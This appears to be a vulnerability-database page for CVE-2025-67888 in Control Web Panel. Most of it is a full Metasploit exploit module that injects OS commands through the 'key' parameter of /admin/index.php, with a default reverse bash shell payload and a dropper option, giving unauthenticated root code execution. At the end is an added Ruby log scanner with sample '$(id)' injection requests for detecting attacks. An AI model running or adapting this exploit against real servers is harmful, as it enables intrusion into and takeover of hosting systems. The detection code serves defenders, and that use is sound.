Control Web Panel 0.9.8.1208 Remote Code Execution

Published: 14 Jan 2026 00:00:00
Reported by: Lukas Johannes Möller, EgiX
Type: packetstorm
Source: packetstorm.news

CWP <= 0.9.8.1208 allows unauthenticated OS command injection via the "key" GET parameter of /admin/index.php when the "api" parameter is set; exploitation needs Softaculous or SitePad installed.

Related (family: title, published)

ATTACKERKB: CVE-2025-67888, 8 May 2026 00:00
Circl: CVE-2025-67888, 18 Dec 2025 15:00
CNNVD: Control Web Panel OS Command Injection Vulnerability, 8 May 2026 00:00
CVE: CVE-2025-67888, 8 May 2026 00:00
Cvelist: CVE-2025-67888, 8 May 2026 00:00
EUVD: EUVD-2025-209736, 8 May 2026 09:31
Metasploit: Control Web Panel /admin/index.php Unauthenticated RCE, 14 Jan 2026 18:54
NVD: CVE-2025-67888, 8 May 2026 07:16
Packet Storm: Control Web Panel 0.9.8.1208 Command Injection, 16 Dec 2025 00:00
Positive Technologies: PT-2026-38670, 8 May 2026 00:00

Code
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      prepend Msf::Exploit::Remote::AutoCheck
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Control Web Panel /admin/index.php Unauthenticated RCE',
            'Description' => %q{
              Control Web Panel (CWP) versions <= 0.9.8.1208 are vulnerable to
              unauthenticated OS command injection. User input passed via the
              "key" GET parameter to /admin/index.php (when the "api" parameter is set)
              is not properly sanitized before being used to execute OS commands.
              This can be exploited by unauthenticated attackers to inject and execute
              arbitrary OS commands with the privileges of the root user on the web server.
    
              Successful exploitation usually requires "Softaculous" and/or "SitePad"
              to be installed through the Scripts Manager.
            },
            'Author' => [
              'Lukas Johannes Möller', # Metasploit module
              'Egidio Romano' # Vulnerability discovery
            ],
            'References' => [
              ['CVE', '2025-67888'],
              ['URL', 'https://karmainsecurity.com/KIS-2025-09'],
              ['URL', 'https://www.cve.org/CVERecord?id=CVE-2025-67888'],
              ['URL', 'https://control-webpanel.com']
            ],
            'DisclosureDate' => '2025-12-16',
            'License' => MSF_LICENSE,
            'Platform' => ['linux', 'unix'],
            'Arch' => ARCH_ALL,
            'Privileged' => true,
            'Targets' => [
              [
                'Unix Command',
                {
                  'Platform' => 'unix',
                  'Arch' => ARCH_ALL,
                  # 'Type' is what #exploit dispatches on; without it neither branch runs
                  'Type' => :unix_cmd,
                  'DefaultOptions' => {
                    'PAYLOAD' => 'cmd/unix/reverse_bash'
                  },
                  'Payload' => {
                    'Encoder' => 'cmd/base64',
                    'BadChars' => "\x00\x20"
                  }
                }
              ],
              [
                'Linux Dropper',
                {
                  'Platform' => 'linux',
                  'Arch' => ARCH_ALL,
                  'Type' => :linux_dropper
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DefaultOptions' => {
              'SSL' => true
            },
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )
    
        register_options([
          Opt::RPORT(2031)
        ])
      end
    
      def check
        sleep_time = rand(5..10)
    
        print_status("Checking vulnerability with sleep command (waiting #{sleep_time} seconds)...")
    
        res, elapsed_time = Rex::Stopwatch.elapsed_time do
          send_request_cgi(
            'method' => 'GET',
            'uri' => normalize_uri('/admin/index.php'),
            'vars_get' => {
              'api' => '1',
              'key' => "$(sleep #{sleep_time})"
            }
          )
        end
    
        vprint_status("Elapsed time: #{elapsed_time.round(2)} seconds")
    
        return CheckCode::Unknown('No response from server.') unless res
        return CheckCode::Vulnerable("Server waited #{elapsed_time.round(2)} seconds (expected >= #{sleep_time}).") if elapsed_time >= sleep_time
    
        CheckCode::Safe("Server responded in #{elapsed_time.round(2)} seconds (expected >= #{sleep_time}).")
      end
    
      def exploit
        print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    
        case target['Type']
        when :unix_cmd
          execute_command(payload.encoded)
        when :linux_dropper
          execute_cmdstager
        end
      end
    
      def execute_command(cmd, _opts = {})
        vprint_status("Executing command: #{cmd}")
    
        send_request_cgi(
          'method' => 'GET',
          'uri' => normalize_uri('/admin/index.php'),
          'vars_get' => {
            'api' => '1',
            'key' => "$(#{cmd})"
          }
        )
      end
    end
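The module's Notes flag IOC_IN_LOGS, so the request shape it sends is visible to defenders. The following is an added example, not part of the Vulners page or the Metasploit module: a small Ruby checker that scans constructed web-server access-log lines (combined log format assumed) for GET /admin/index.php requests with "api" set and a "key" value carrying shell command-substitution or separator syntax, which is the injection shape described above.

```ruby
require 'cgi'
require 'uri'

# Constructed sample access-log lines (combined format, assumed); not taken
# from any real CWP host. Lines 2 and 3 mimic the request shape the
# description above attributes to CVE-2025-67888; line 4 lacks "api".
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [16/Dec/2025:10:01:02 +0000] "GET /admin/index.php?api=1&key=abcdef0123456789 HTTP/1.1" 200 512 "-" "curl/8.4.0"
  203.0.113.9 - - [16/Dec/2025:10:01:07 +0000] "GET /admin/index.php?api=1&key=%24%28sleep%207%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  203.0.113.9 - - [16/Dec/2025:10:01:20 +0000] "GET /admin/index.php?api=1&key=%24%28id%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  198.51.100.2 - - [16/Dec/2025:10:02:00 +0000] "GET /admin/index.php?key=%24%28id%29 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  198.51.100.3 - - [16/Dec/2025:10:03:00 +0000] "GET /login/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
LOG

# Shell constructs that have no place in an API key: $(...), ${...},
# backticks, command separators and pipes.
SHELL_META = /\$\(|\$\{|`|[;|&]/.freeze

# Parse one combined-format line into method, path and decoded query params.
# Returns nil for lines that do not look like an access-log entry.
def parse_request(line)
  m = line.match(%r{"(?<method>[A-Z]+) (?<target>\S+) HTTP/[\d.]+"})
  return nil unless m
  uri = URI.parse(m[:target]) rescue nil
  return nil unless uri
  params = uri.query ? CGI.parse(uri.query) : {}
  { method: m[:method], path: uri.path, params: params }
end

# True when a request matches the injection shape described on this page:
# /admin/index.php with "api" present and "key" containing shell metacharacters.
def suspicious_cwp_request?(req)
  return false unless req && req[:path] == '/admin/index.php'
  return false unless req[:params].key?('api')
  req[:params].fetch('key', []).any? { |v| v.match?(SHELL_META) }
end

# Scan log text; return the client IP and decoded key for every hit.
def scan_log(text)
  text.each_line.filter_map do |line|
    req = parse_request(line)
    next unless suspicious_cwp_request?(req)
    { ip: line.split(' ', 2).first, key: req[:params]['key'].first }
  end
end

if $PROGRAM_NAME == __FILE__
  scan_log(SAMPLE_LOG).each { |h| puts "#{h[:ip]} key=#{h[:key].inspect}" }
end
```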
